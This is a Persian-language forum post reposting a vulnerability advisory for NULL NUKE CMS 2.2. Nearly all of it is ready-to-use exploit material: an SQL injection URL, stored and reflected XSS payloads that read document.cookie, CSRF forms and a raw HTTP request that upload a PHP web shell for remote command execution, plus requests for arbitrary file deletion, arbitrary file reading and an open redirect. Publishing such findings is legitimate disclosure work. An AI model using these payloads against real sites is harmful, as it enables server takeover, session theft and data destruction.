SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

NULL NUKE CMS 2.2 - Multiple Vulnerabilities

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    NULL NUKE CMS 2.2 - Multiple Vulnerabilities

    کد:
    -------------------------------------[*] SQL Injection, CSRF (msgid param)
-------------------------------------
 
http://localhost/nullnuke/msgbox.php?nxt=readmsg&view=1&msgid=7%27
 
 
----------------------------------------[*] Stored XSS, CSRF (faqcattitle param)
----------------------------------------
 
<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=faq&nxt=FaqCatAdd" method="POST">
<input type="hidden" name="faqcattitle" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Execute!" />
</form>
</body></html>
 
 
-----------------------------------------------------------------------------------------[*] Arbitrary File Upload at arbitrary location, CSRF, RCE (fupload[1], uploadpath param)
-----------------------------------------------------------------------------------------
 
POST /nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------117202350024276
Content-Length: 786
 
-----------------------------117202350024276
Content-Disposition: form-data; name="fupload[1]"; filename="shell.php"
Content-Type: application/octet-stream
 
<?php passthru($_GET['cmd']); ?>
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadpath"
 
C:/xampp/htdocs/nullnuke22/
-----------------------------117202350024276
Content-Disposition: form-data; name="_numfeilds"
 
1
-----------------------------117202350024276
Content-Disposition: form-data; name="uploadform"
 
Upload
-----------------------------117202350024276
Content-Disposition: form-data; name="unpack_archive"
 
0
-----------------------------117202350024276
Content-Disposition: form-data; name="addfeild"
 
1
-----------------------------117202350024276--
 
 
--
 
<html><body>
<form action="http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here" method="POST" enctype="multipart/form-data">
<input type="hidden" name="fupload[1]" value="<?php passthru($_GET['cmd']); ?>" />
<input type="hidden" name="uploadpath" value="C:/xampp/htdocs/nullnuke22/" />
<input type="hidden" name="_numfeilds" value="1" />
<input type="hidden" name="uploadform" value="Upload" />
<input type="hidden" name="unpack_archive" value="0" />
<input type="hidden" name="addfeild" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>
 
 
---------------------------------------------------[*] Arbitrary File Deletion, CSRF (dfarray[] param)
---------------------------------------------------
 
<html><body>
<form action="http://localhost/nullnuke2/admin.php?fct=file_types&nxt=fileSystem" method="POST">
<input type="hidden" name="delfile" value="Delete" />
<input type="hidden" name="dfarray[]" value="C:/secret_secrets.txt" />
<input type="submit" value="Execute!" />
</form>
</body></html>
 
 
-------------------------------------------------------------------------------------------[*] Arbitrary File Read using absolute path, CSRF (file param, value needs to be in base64)
-------------------------------------------------------------------------------------------
 
http://localhost/nullnuke22/admin.php?fct=file_types&nxt=getfile&path=&file=QzpcdGVzdC50eHQ=
 
 - QzpcdGVzdC50eHQ= (C:\test.txt)
 
 
-------------------------------------------[*] Open Redirect, CSRF (redirectlgn param)
-------------------------------------------
 
<html><body>
<form action="http://localhost/nullnuke22/login.php?nxt=chklogin" method="POST">
<input type="hidden" name="uname" value="admin" />
<input type="hidden" name="pass" value="admin" />
<input type="hidden" name="remlogin" value="0" />
<input type="hidden" name="redirectlgn" value="http://www.zeroscience.mk" />
<input type="hidden" name="stripit_form" value="uname|pass" />
<input type="hidden" name="mpn_sectype" value="1" />
<input type="submit" value="Execute!" />
</form>
</body></html>
 
 
-----------------------------------------------------------------[*] Reflected XSS, CSRF (upload param, Referer HTTP Header field)
-----------------------------------------------------------------
 
http://localhost/nullnuke22/admin.php?fct=file_types&nxt=fileSystem&upload=here1f454"><script>alert(1);</script>6747f198ae5
 
--
 
GET /nullnuke22/login.php?nxt=chklogin&uname=admin&pass=admin&remlogin=0&redirectlgn=http%3A%2F%2Flocalhost%2Fnullnuke22%2Fadmin.php%3Ffct%3Dfile_types%26nxt%3DfileSystem%26upload%3Dhere&stripit_form=uname%7Cpass&mpn_sectype=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.google.com/search?hl=en&q=b55ec"><script>alert(document.cookie);</script>bb8d1b11bd9304d5f
Connection: keep-alive
    [align=center][/align]
    برچسب ها: هیچ یک
قبلی template بعدی
صبر کنید ..
X